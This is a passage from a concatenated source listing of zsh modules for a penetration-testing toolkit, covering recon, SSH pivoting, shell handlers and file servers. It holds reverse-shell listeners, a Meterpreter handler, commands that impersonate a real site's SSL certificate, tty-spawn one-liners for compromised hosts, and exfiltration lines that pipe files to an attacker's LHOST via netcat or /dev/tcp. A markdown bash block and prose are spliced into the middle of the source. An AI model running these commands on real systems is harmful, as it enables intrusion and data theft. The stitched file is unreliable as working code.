qq-notes-install: installs dependencies
qq-notes: lists all notes in $__NOTES or searches notes by filename if $1 is supplied
qq-notes-content: list all notes in $__NOTES or searches notes by content if $1 is supplied
qq-notes-menu: display an interactive menu for reading notes
DOC
}
qq-notes-install() {
__info "Running $0..."
__pkgs fzf ripgrep
qq-install-golang
go get -u github.com/charmbracelet/glow
qq-install-bat
}
qq-notes() {
__notes-check
__info "Use \$1 to search file names"
select note in $(ls -R --file-type ${__NOTES} | grep -ie ".md$" | grep -i "$1")
do [[ -n "${note}" ]] && break
# an invalid selection returns from the function; exit would close the interactive shell
return 1
done
[[ ! -z ${note} ]] && glow ${__NOTES}/${note}
}
qq-notes-content() {
__notes-check
__info "Use \$1 to search content"
select note in $(grep -rliw "$1" ${__NOTES}/*.md)
do [[ -n "${note}" ]] && break
# an invalid selection returns from the function; exit would close the interactive shell
return 1
done
[[ ! -z ${note} ]] && glow ${note}
}
qq-notes-menu() {
__notes-check
pushd ${__NOTES} &> /dev/null
# fzf field placeholders are written {1}; ${1} inside single quotes is an (empty) shell positional parameter
rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 "" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always {1}'
popd &> /dev/null
}
================================================
FILE: modules/qq-pivot.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-pivot
#############################################################
qq-pivot-help() {
cat << "DOC"
qq-pivot
--------
The pivot namespace provides commands for using ssh to proxy and pivot.
Commands
--------
qq-pivot-install: installs dependencies
qq-pivot-mount-remote-sshfs: mounts a remote directory to local /mnt path using sshfs
qq-pivot-ssh-dynamic-proxy: uses remote as a dynamic proxy
qq-pivot-ssh-remote-to-local: forwards remote port to local port
qq-pivot-ssh-remote-to-local-burp: forwards remote port 8080 to local port 8080
DOC
}
qq-pivot-install() {
__info "Running $0..."
__pkgs sshfs rsync
}
qq-pivot-mount-remote-sshfs() {
__check-user
local lm && __askpath lm LMOUNT /mnt
local rm && __askvar rm RMOUNT /
qq-vars-set-rhost
mkdir -p ${lm}
print -z "sshfs ${__USER}@${__RHOST}:${rm} ${lm}"
}
qq-pivot-ssh-dynamic-proxy() {
__check-user
qq-vars-set-rhost
qq-vars-set-lport
print -z "ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}"
}
qq-pivot-ssh-remote-to-local() {
__check-user
qq-vars-set-rhost
qq-vars-set-rport
qq-vars-set-lport
print -z "ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}"
}
qq-pivot-ssh-remote-to-local-burp() {
__check-user
qq-vars-set-rhost
print -z "ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}"
}
================================================
FILE: modules/qq-project-custom.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-project-custom
#############################################################
qq-project-custom-help() {
cat << "DOC"
qq-project-custom
-----------------
The qq-project-custom namespace provides commands to setup custom project
directory structures and variables for users that have specific requirements.
Variables
---------
__PROJECT_ZD_CONSULTANT: a global variable for consultant name used in ZD projects
__PROJECT_ZD_ROOT: a global variable for the project root folder used in ZD projects
Commands
--------
qq-project-custom-zd-start: scaffolds directory structure and logbook for "zd" projects
qq-project-custom-zd-end: zips and removes directories and data for "zd" projects
qq-project-custom-zd-root-set: sets the __PROJECT_ZD_ROOT variable
qq-project-custom-zd-consultant-set: sets the __PROJECT_ZD_CONSULTANT variable
DOC
}
export __PROJECT_ZD=""
export __PROJECT_ZD_CONSULTANT="$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)"
export __PROJECT_ZD_ROOT="$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)"
__check-project-zd() {
if [[ -z $__PROJECT_ZD_ROOT ]]
then
qq-project-custom-zd-root-set
fi
if [[ -z $__PROJECT_ZD_CONSULTANT ]]
then
qq-project-custom-zd-consultant-set
fi
}
qq-project-custom-zd-root-set() {
__warn "Enter the full path to the root folder of your projects."
__prefill __PROJECT_ZD_ROOT DIR $HOME
echo "${__PROJECT_ZD_ROOT}" > ${__GLOBALS}/__PROJECT_ZD_ROOT
}
qq-project-custom-zd-consultant-set() {
__warn "Enter consultant name below."
__askvar __PROJECT_ZD_CONSULTANT NAME
echo "${__PROJECT_ZD_CONSULTANT}" > ${__GLOBALS}/__PROJECT_ZD_CONSULTANT
}
qq-project-custom-zd-start() {
__check-project-zd
local pid && __askvar pid "PROJECT ID"
local pname && __askvar pname "PROJECT NAME"
local fname="${pid}-${pname}-${__PROJECT_ZD_CONSULTANT// /}"
local fullpath=${__PROJECT_ZD_ROOT}/${fname}
#scaffold
mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output}
#set project to be tool-output
__PROJECT=${fullpath}/tool-output
# wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work
local setlog && read "setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color "
case "$setlog" in
y|Y )
qq-log-set
;;
n|N )
echo "no"
;;
* )
echo ""
;;
esac
}
qq-project-custom-zd-end() {
__check-project-zd
__ask "Select a project folder: "
local pd=$(__menu $(find $__PROJECT_ZD_ROOT -mindepth 1 -maxdepth 1 -type d))
__ok "Selected: ${pd}"
# Task 1: delete all empty folders
local df && read "df?$fg[cyan]Delete empty folders? (Y/n)?:$reset_color "
if [[ "$df" =~ ^[Yy]$ ]]
then
find ${pd} -type d -empty -delete
__ok "Empty folders deleted."
fi
# Task 2: create tree
cd ${pd}
tree -C -F -H ./ > ${pd}/tree.html
[[ -f "${pd}/tree.html" ]] && __ok "Created ${pd}/tree.html." || __err "Failed creating ${pd}/tree.html"
cd - > /dev/null 2>&1
# Task 3: zip up engagement folder
local zf=$(basename ${pd})
7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ZD_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1
[[ -f ${__PROJECT_ZD_ROOT}/${zf}.7z ]] && __ok "Zipped files into ${__PROJECT_ZD_ROOT}/${zf}.7z." || __err "Failed to zip ${pd}"
# Task 4: Delete engagement folder
local rmp && read "rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color "
[[ "${rmp}" =~ ^[Yy]$ ]] && print -z "rm -rf ${pd}"
__ok "Project ended."
}
================================================
FILE: modules/qq-project.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-project
#############################################################
qq-project-help() {
cat << "DOC"
qq-project
----------
The project namespace provides commands that help with setting
up scope for an engagement or bug bounty, as well as commands for
syncing data and managing a VPS.
Commands
--------
qq-project-install: installs dependencies
qq-project-scope: generate a scope regex by root word (matches all to the left and right)
qq-project-rescope-txt: uses rescope to generate scope from a url
qq-project-rescope-burp: uses rescope to generate burp scope (JSON) from a url
qq-project-sync-remote-to-local: sync data from a remote server directory to a local directory using SSHFS
qq-project-sync-local-file-to-remote: sync a local file to a remote server using rsync over SSH
qq-project-google-domain-dyn: update IP address using Google domains hosted dynamic record
DOC
}
qq-project-install() {
__info "Running $0..."
__pkgs fusermount sshfs rsync curl
qq-install-golang
go get -u github.com/root4loot/rescope
}
qq-project-scope() {
__check-project
__check-org
print -z "echo \"^.*?${__ORG}\..*\$ \" >> ${__PROJECT}/scope.txt"
}
qq-project-rescope-burp() {
__check-project
__ask "Enter the URL to the bug bounty scope description"
qq-vars-set-url
mkdir -p ${__PROJECT}/burp
print -z "rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json"
}
qq-project-sync-remote-to-local() {
__warn "Enter your SSH connection username@remote_host"
local ssh && __askvar ssh SSH
__warn "Enter the full remote path to the directory you want to copy from"
local rdir && __askvar rdir "REMOTE DIR"
__warn "Enter the full local path to the directory to use as a mount point"
local mnt && __askpath mnt "LOCAL MOUNT" /mnt
__warn "Enter the full local path to the directory to sync the data to"
local ldir && __askpath ldir "LOCAL DIR" $HOME
sudo mkdir -p $mnt
__ok "Mounting $rdir to $mnt ..."
sudo sshfs ${ssh}:${rdir} ${mnt}
__ok "Syncing data from $mnt to $ldir ..."
sudo rsync -avuc ${mnt} ${ldir}
__ok "Unmounting $mnt. ..."
sudo fusermount -u ${mnt}
__ok "Sync Completed"
}
qq-project-sync-local-file-to-remote() {
__warn "Enter your SSH connection username@remote_host"
local ssh && __askvar ssh SSH
__warn "Enter the full local path to the file you want to copy to your remote server"
local lfile && __askpath lfile "LOCAL FILE" $HOME
__warn "Enter the full remote path to the directory you want to copy the file to"
local rdir && __askvar rdir "REMOTE DIR"
print -z "rsync -avz -e \"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" --progress $lfile $ssh:$rdir"
}
qq-project-google-domain-dyn() {
local u && __askvar u USERNAME
local p && __askvar p PASSWORD
local d && __askvar d DOMAIN
qq-vars-set-lhost
# -A sets the user agent (-a is append); the URL is quoted so the & is not treated as a job separator
print -z "curl -s -A \"${__UA}\" \"https://$u:$p@domains.google.com/nic/update?hostname=${d}&myip=${__LHOST}\" "
}
================================================
FILE: modules/qq-recon-domains.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-domains
#############################################################
qq-recon-domains-help() {
cat << "DOC"
qq-recon-domains
----------------
The recon-domains namespace provides commands to recon horizontal domains of a root domain.
All domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass.
You can sort unique this file in place with the "sfu" alias.
Commands
--------
qq-recon-domains-install: installs dependencies
qq-recon-domains-amass-whois: find domains with whois
qq-recon-domains-amass-asn: find domains by asn
DOC
}
qq-recon-domains-install() {
__info "Running $0..."
__pkgs amass
}
qq-recon-domains-amass-whois() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
mkdir -p ${__PROJECT}/domains
print -z "amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt"
}
qq-recon-domains-amass-asn() {
__check-project
__check-asn
mkdir -p ${__PROJECT}/amass
mkdir -p ${__PROJECT}/domains
print -z "amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt"
}
================================================
FILE: modules/qq-recon-github.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-github
#############################################################
qq-recon-github-help() {
cat << "DOC"
qq-recon-github
---------------
The recon-github namespace provides commands for the recon of github repos.
All output will be stored under $__PROJECT/source
Commands
--------
qq-recon-github-install: installs dependencies
qq-recon-github-user-repos: uses curl to get a list of repos for a github user
qq-recon-github-endpoints: gets a list of urls from all repos of a domain on github
qq-recon-github-gitrob: clones (in mem) repos and searches for github dorks
qq-recon-github-api-set: set github API key global variable
DOC
}
qq-recon-github-install() {
__info "Running $0..."
__pkgs curl jq python3
qq-install-golang
qq-install-github-search
qq-install-git-secrets
qq-install-gitrob
}
qq-recon-github-user-repos() {
__check-project
__check-user
mkdir -p ${__PROJECT}/source
print -z "curl -s \"https://api.github.com/users/${__USER}/repos?per_page=1000\" | jq '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt "
}
qq-recon-github-endpoints() {
__check-api-github
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/source
print -z "github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt "
}
qq-recon-github-gitrob() {
__check-api-github
__check-project
__check-user
local d=${__PROJECT}/source/${__USER}
mkdir -p $d
cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d
__info "Gitrob UI: http://127.0.0.1:9393/"
print -z "pushd $d ;gitrob -in-mem-clone -save \"$d/output.json\" -github-access-token $__API_GITHUB ${__USER} && popd"
}
================================================
FILE: modules/qq-recon-networks.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-networks
#############################################################
qq-recon-networks-help() {
cat << "DOC"
qq-recon-networks
-------------
The recon-networks namespace provides commands to recon ASNs and IP networks for an organization.
All network data is stored in $__PROJECT/networks.
Commands
--------
qq-recon-networks-install: installs dependencies
qq-recon-networks-amass-asns: find asns by organization name (amass intel -org)
qq-recon-networks-bgp: use the bgp.he.net website to find asns and networks
qq-recon-networks-bgpview-ipv4: curl api.bgpview.io for ipv4 networks by asn
qq-recon-networks-bgpview-ipv6: curl api.bgpview.io for ipv6 networks by asn
DOC
}
qq-recon-networks-install() {
__info "Running $0..."
__pkgs curl jq amass
}
qq-recon-networks-bgp() {
__info "Search https://bgp.he.net/"
}
qq-recon-networks-amass-asns() {
__check-project
__check-org
mkdir -p ${__PROJECT}/networks
print -z "amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt "
}
qq-recon-networks-bgpview-ipv4() {
__check-project
__check-asn
mkdir -p ${__PROJECT}/networks
print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt"
}
qq-recon-networks-bgpview-ipv6() {
__check-project
__check-asn
mkdir -p ${__PROJECT}/networks
print -z "curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv6.txt"
}
================================================
FILE: modules/qq-recon-org.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-org
#############################################################
qq-recon-org-help() {
cat << "DOC"
qq-recon-org
------------
The recon-org namespace provides commands for the recon of an organization.
Data from commands will be stored in $__PROJECT/recon.
Commands
--------
qq-recon-org-install: installs dependencies
qq-recon-org-files-metagoofil: uses metagoofil to search and download files for a domain
qq-recon-org-files-urls: extracts URLs for the domain from the downloaded files (strings + gf)
qq-recon-org-wordlist-by-url-cewl: uses cewl to create a custom wordlist from a url
qq-recon-org-theharvester: uses theHarvester to mine data about a target domain
qq-recon-org-cse: reminder to build a Google custom search engine for the target
DOC
}
qq-recon-org-install() {
__info "Running $0..."
__pkgs whois metagoofil cewl theharvester
}
qq-recon-org-files-metagoofil() {
__check-project
__check-ext-docs
qq-vars-set-domain
mkdir -p ${__PROJECT}/recon/files
print -z "metagoofil -u \"${__UA}\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files"
}
qq-recon-org-files-urls() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/recon
# reads the files downloaded by qq-recon-org-files-metagoofil rather than whatever is in the current dir
print -z "strings ${__PROJECT}/recon/files/* | gf urls | grep \"${__DOMAIN}\" | sort -u | tee -a ${__PROJECT}/recon/urls.txt"
}
qq-recon-org-wordlist-by-url-cewl() {
__check-project
qq-vars-set-url
mkdir -p ${__PROJECT}/recon
print -z "cewl -a -d 3 -m 5 -u \"${__UA}\" -w ${__PROJECT}/recon/cewl.txt ${__URL}"
}
qq-recon-org-theharvester() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/recon
print -z "theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt"
}
qq-recon-org-cse() {
__info "Use https://cse.google.com/cse/all to create a custom search engine"
}
================================================
FILE: modules/qq-recon-subs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-recon-subs
#############################################################
qq-recon-subs-help() {
cat << "DOC"
qq-recon-subs
-------------
The recon-subs namespace provides commands to recon vertical sub-domains of a root domain.
All subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$__DOMAIN/subs.txt.
You can sort unique this file in place with the "sfu" alias.
Commands
--------
qq-recon-subs-install: installs dependencies
Commands - enumeration
----------------------
qq-recon-subs-amass-enum: enumerate subdomains into amass db (api keys help)
qq-recon-subs-amass-diff: track changes between last 2 enumerations using amass db
qq-recon-subs-amass-names: list gathered subs in the amass db
qq-recon-subs-crt.sh: gather subdomains from crt.sh
qq-recon-subs-subfinder: gather subdomains from sources (api keys help)
qq-recon-subs-assetfinder: gather subdomains from sources (api keys help)
qq-recon-subs-wayback: gather subdomains from Wayback Machine
Commands - brute force
----------------------
qq-recon-subs-brute-massdns: try to resolve a list of subdomains generated for brute forcing
qq-recon-subs-gen-wordlist: generate a wordlist of possible sub domains
Commands - processing
---------------------
qq-recon-subs-resolve-massdns: resolve a file of subdomains using massdns
qq-recon-subs-resolve-parse: parse resolved.txt into A, CNAME and IP's
DOC
}
qq-recon-subs-install() {
__info "Running $0..."
__pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils
qq-install-golang
# go get no longer installs binaries (Go 1.17+); use go install with an explicit version
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/tomnomnom/assetfinder@latest
go install github.com/tomnomnom/waybackurls@latest
qq-install-massdns
}
qq-recon-subs-amass-enum() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass"
}
qq-recon-subs-amass-diff() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass"
}
qq-recon-subs-amass-names() {
__check-project
qq-vars-set-domain
mkdir -p ${__PROJECT}/amass
print -z "amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-crt.sh() {
__check-project
qq-vars-set-domain
print -z "curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \"${__DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u | tee -a $(__dompath)/subs.txt "
}
qq-recon-subs-subfinder() {
__check-project
qq-vars-set-domain
__check-threads
print -z "subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-assetfinder() {
__check-project
qq-vars-set-domain
print -z "echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-wayback() {
__check-project
qq-vars-set-domain
# field 3 of the URL is host[:port]; strip any port rather than only dropping :80 hosts
print -z "echo ${__DOMAIN} | waybackurls | cut -d'/' -f3 | cut -d':' -f1 | sort -u | tee -a $(__dompath)/subs.txt"
}
qq-recon-subs-resolve-massdns() {
__check-project
__check-resolvers
qq-vars-set-domain
print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved.txt $(__dompath)/subs.txt"
}
qq-recon-subs-brute-massdns() {
__check-project
__check-resolvers
qq-vars-set-domain
__ask "Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)"
local f && __askpath f FILE $(__dompath)
print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved-brute.txt $f"
}
qq-recon-subs-resolve-parse() {
__check-project
qq-vars-set-domain
__info "Generating files resolved-*.txt"
grep -ie "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt
grep -v "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt
grep -v "CNAME" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt
}
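qq-recon-subs-resolve-parse above splits massdns -o S output with grep and cut. The bash below is an added example, not quiver code: it does the same split with awk on a constructed sample, checks that the IP column really holds IPv4 addresses (CNAME rdata is a name, not an address), and additionally lists CNAMEs whose target never produced an A record in the same run, which is the first list to review for dangling records and subdomain takeover. Every name and address in SAMPLE_RESOLVED is constructed; the output files mirror the resolved-*.txt names the quiver function writes.

```bash
#!/usr/bin/env bash
# massdns "-o S" prints one answer RR per line:  <name>. <TYPE> <rdata>
# Constructed sample (not real resolver output): a CNAME chain that resolves,
# a plain A record, a duplicate line, and a CNAME whose target never resolved.
SAMPLE_RESOLVED='www.example.org. CNAME edge.example.org.
edge.example.org. A 203.0.113.10
edge.example.org. A 203.0.113.11
api.example.org. A 203.0.113.20
www.example.org. CNAME edge.example.org.
old.example.org. CNAME gone.s3.amazonaws.com.'

# Unique records of one type with trailing dots stripped: resolved_records <A|CNAME> <file>
resolved_records() {
  awk -v want="$1" '$2 == want { sub(/\.$/, "", $1); sub(/\.$/, "", $3); print $1, $3 }' "$2" \
    | sort -u
}

# Unique IPv4 addresses taken only from A records whose rdata looks like an address
resolved_ips() {  # usage: resolved_ips <file>
  awk '$2 == "A" && $3 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { print $3 }' "$1" | sort -u
}

# CNAMEs whose target has no A record anywhere in the run (dangling / takeover candidates).
# The file is read twice: pass one collects A owners, pass two filters CNAMEs.
resolved_dangling() {  # usage: resolved_dangling <file>
  awk 'NR == FNR { if ($2 == "A") has_a[$1] = 1; next }
       $2 == "CNAME" && !($3 in has_a) { sub(/\.$/, "", $1); sub(/\.$/, "", $3); print $1, $3 }' \
       "$1" "$1" | sort -u
}

# Write the same resolved-*.txt files as qq-recon-subs-resolve-parse, plus the dangling list
parse_resolved() {  # usage: parse_resolved <resolved.txt> <outdir>
  mkdir -p "$2"
  resolved_records A     "$1" > "$2/resolved-A.txt"
  resolved_records CNAME "$1" > "$2/resolved-CNAME.txt"
  resolved_ips           "$1" > "$2/resolved-IP.txt"
  resolved_dangling      "$1" > "$2/resolved-dangling.txt"
}
```

Run it as `parse_resolved $(__dompath)/resolved.txt $(__dompath)` after qq-recon-subs-resolve-massdns; anything in resolved-dangling.txt points at a provider host that no longer answers and deserves a manual look before it is reported.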
qq-recon-subs-gen-wordlist() {
__check-project
qq-vars-set-domain
local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
print -z "for s in \$(cat ${f}); do echo \$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done"
}
================================================
FILE: modules/qq-scripts.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-scripts
#############################################################
# qq-scripts-help() {
# cat << "DOC"
# qq-scripts
# -------
# The scripts namespace runs scripts from the quiver
# scripts directory.
# ** IN DEVELOPMENT, NOT READY FOR USE **
# Commands
# --------
# qq-scripts-recon: a zsh recon script
# qq-scripts-webrecon: a zsh webrecon script
# DOC
# }
# qq-scripts-recon() {
# local d && read "d?$(__cyan DOMAIN: )"
# local o && read "o?$(__cyan ORG: )"
# local w && read "w?$(__cyan WORKING\(DIR\): )"
# print -z "zsh ${__SCRIPTS}/recon.zsh ${d} \"${o}\" \"${w}\""
# }
# qq-scripts-webrecon() {
# local f=$(rlwrap -S "$(__cyan FILE:\(DOMAINS\))" -e '' -c -o cat)
# local w && read "w?$(__cyan WORKING\(DIR\): )"
# pushd ${w}
# print -z "zsh ${__SCRIPTS}/webrecon.zsh ${f}"
# popd
# }
================================================
FILE: modules/qq-shell-handlers-msf.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-handlers-msf
#############################################################
qq-shell-handlers-msf-help() {
cat << "DOC"
qq-shell-handlers-msf
---------------------
The shell-handlers-msf namespace provides commands for spawning
reverse shell connections using metasploit.
Commands
--------
qq-shell-handlers-msf-install: installs dependencies
qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells
qq-shell-handlers-msf-w64-https: multi-handler for staged windows/x64/meterpreter/reverse_https payload
DOC
}
qq-shell-handlers-msf-install() {
__info "Running $0..."
__pkgs metasploit-framework
}
qq-shell-handlers-msf-ssl-gen() {
__ask "Enter the hostname of the site to impersonate"
local r && __prefill r SITE aka.ms
local cmd="use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit "
__info "Use qq-vars-global-set-shell-ssl-cert to set the path of the generated .pem file"
print -z "msfconsole -n -q -x \"${cmd}\" "
}
qq-shell-handlers-msf-w64-https() {
qq-vars-set-lhost
qq-vars-set-lport
__msf << VAR
use exploit/multi/handler;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set LHOST ${__LHOST};
set LPORT ${__LPORT};
set HANDLERSSLCERT ${__SHELL_SSL_CERT};
set EXITONSESSION false;
run;
exit
VAR
}
================================================
FILE: modules/qq-shell-handlers.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-handlers
#############################################################
qq-shell-handlers-help() {
cat << "DOC"
qq-shell-handlers
-----------------
The shell-handlers namespace provides commands for spawning reverse shell
connections.
Commands
--------
qq-shell-handlers-install: installs dependencies
qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells
qq-shell-handlers-nc: netcat TCP listener on $__LPORT
qq-shell-handlers-ncrl: netcat TCP listener wrapped in rlwrap for line editing and history
qq-shell-handlers-nc-udp: netcat UDP listener on $__LPORT
qq-shell-handlers-socat: socat listener that attaches the connection to a raw local tty (full interactive shell)
DOC
}
qq-shell-handlers-install() {
__info "Running $0..."
__pkgs netcat socat
}
# netcat
qq-shell-handlers-nc() {
qq-vars-set-lport
print -z "nc -nlvp ${__LPORT}"
}
qq-shell-handlers-ncrl() {
qq-vars-set-lport
print -z "rlwrap nc -nlvp ${__LPORT}"
}
qq-shell-handlers-nc-udp() {
qq-vars-set-lport
print -z "nc -nlvu ${__LPORT}"
}
# socat
qq-shell-handlers-socat() {
qq-vars-set-lport
print -z "socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}"
}
================================================
FILE: modules/qq-shell-tty.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-shell-tty
#############################################################
qq-shell-tty-help() {
cat << "DOC"
qq-shell-tty
------------
The shell-tty namespace provides commands for fixing interactive
command/reverse shells.
Commands
--------
qq-shell-tty-python2: command to spawn a tty shell
qq-shell-tty-python3: command to spawn a tty shell
qq-shell-tty-perl: command to spawn a tty shell
qq-shell-tty-ruby: command to spawn a tty shell
qq-shell-tty-lua: command to spawn a tty shell
qq-shell-tty-expect: command to spawn a tty shell
DOC
}
qq-shell-tty-python2() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
python -c 'import pty;pty.spawn("/bin/sh")'
DOC
}
qq-shell-tty-python3() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
python3 -c 'import pty;pty.spawn("/bin/sh")'
DOC
}
qq-shell-tty-perl() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
perl -e 'exec "/bin/sh";'
DOC
}
qq-shell-tty-ruby() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
ruby: exec "/bin/sh"
DOC
}
qq-shell-tty-lua() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
lua: os.execute('/bin/sh')
DOC
}
qq-shell-tty-expect() {
__ok "Copy the commands below and use on the remote system"
cat << "DOC"
expect -c 'spawn /bin/sh; interact'
DOC
}
================================================
FILE: modules/qq-srv.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-srv
#############################################################
qq-srv-help() {
cat << "DOC"
qq-srv
-------
The srv namespace provides commands for hosting local services
such as web, ftp, smb and other services for data exfil or transfer.
Commands
--------
qq-srv-install: install dependencies
qq-srv-web: hosts a python3 web server in current dir
qq-srv-ftp: hosts a python3 ftp server in current dir
qq-srv-smb: hosts an impacket smb server in current dir
qq-srv-tftp: starts the atftpd service in /srv/tftp
qq-srv-smtp: hosts a python3 smtp server in current dir
qq-srv-updog: hosts an updog web server in current dir
qq-srv-nc-tar: hosts a netcat server > tar file in current dir
qq-srv-nc-file: hosts a netcat server > file in current dir
qq-srv-nc-b64: hosts a netcat server > base64-decoded file in current dir
qq-srv-web-hosted: hosts a python3 web server in /srv, port as $1
qq-srv-php-hosted: hosts a php web server in /srv, port as $1
qq-srv-ftp-hosted: hosts a python3 ftp server in /srv
qq-srv-updog-hosted: hosts an updog web server in /srv
DOC
}
qq-srv-install() {
__info "Running $0..."
__pkgs netcat atftpd
__pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts
sudo pip3 install updog
}
qq-srv-web() print -z "sudo python3 -m http.server 80"
qq-srv-ftp() print -z "sudo python3 -m pyftpdlib -p 21 -w"
qq-srv-smb() print -z "sudo impacket-smbserver -smb2support F ."
qq-srv-tftp() print -z "sudo service atftpd start"
# the smtpd module was removed from the standard library in Python 3.12; use aiosmtpd on newer systems
qq-srv-smtp() print -z "sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25"
qq-srv-web-hosted() {
__info "Serving content from /srv"
if [ "$#" -eq "1" ]
then
pushd /srv &> /dev/null
sudo python3 -m http.server $1
popd &> /dev/null
else
pushd /srv &> /dev/null
sudo python3 -m http.server 80
popd &> /dev/null
fi
}
qq-srv-php-hosted() {
__info "Serving content from /srv"
if [ "$#" -eq "1" ]
then
pushd /srv &> /dev/null
sudo php -S 0.0.0.0:$1
popd &> /dev/null
else
pushd /srv &> /dev/null
sudo php -S 0.0.0.0:80
popd &> /dev/null
fi
}
qq-srv-ftp-hosted() {
__info "Serving content from /srv"
pushd /srv &> /dev/null
sudo python3 -m pyftpdlib -p 21 -w
popd &> /dev/null
}
qq-srv-updog() {
# -p is the port; the access password is --password (a second -p would silently override the port)
print -z "updog -p 443 --ssl --password $(__rand 10)"
}
qq-srv-updog-hosted() {
__info "Serving content from /srv"
sudo updog -p 443 --ssl -d /srv
}
qq-srv-nc-tar() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
echo "tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}"
print -z "nc -nvlp ${__LPORT} | tar xfv -"
}
qq-srv-nc-file() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
echo "cat FILE > /dev/tcp/${__LHOST}/${__LPORT}"
print -z "nc -nvlp ${__LPORT} -w 5 > incoming.txt"
}
qq-srv-nc-b64() {
qq-vars-set-lhost
qq-vars-set-lport
__cyan "Use the command below on the target system: "
